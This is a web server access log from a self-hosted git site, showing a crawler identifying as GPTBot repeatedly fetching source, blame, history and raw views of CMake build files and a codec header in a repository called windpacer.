[Client 74.7.227.38] [Length 15109] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:36:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13671] [Gzip 7.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:36:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11044] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:36:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11040] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:36:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15106] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:36:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:36:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13698] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:36:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10192] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:36:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10924] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:36:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9975] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:36:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21633] [Gzip 28.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:36:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9973] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:36:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9962] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:36:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9977] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:36:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21630] [Gzip 28.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:36:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9974] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:36:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9964] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:36:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21680] [Gzip 28.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21677] [Gzip 28.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:36:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15361] [Gzip 8.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:36:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:36:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15364] [Gzip 8.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:36:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11017] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:36:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11020] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:36:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15082] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:36:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:36:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:36:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10167] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:36:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10928] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:36:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13699] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10925] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:36:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13700] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:36:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9950] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21605] [Gzip 28.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9951] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9939] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21652] [Gzip 28.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:36:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 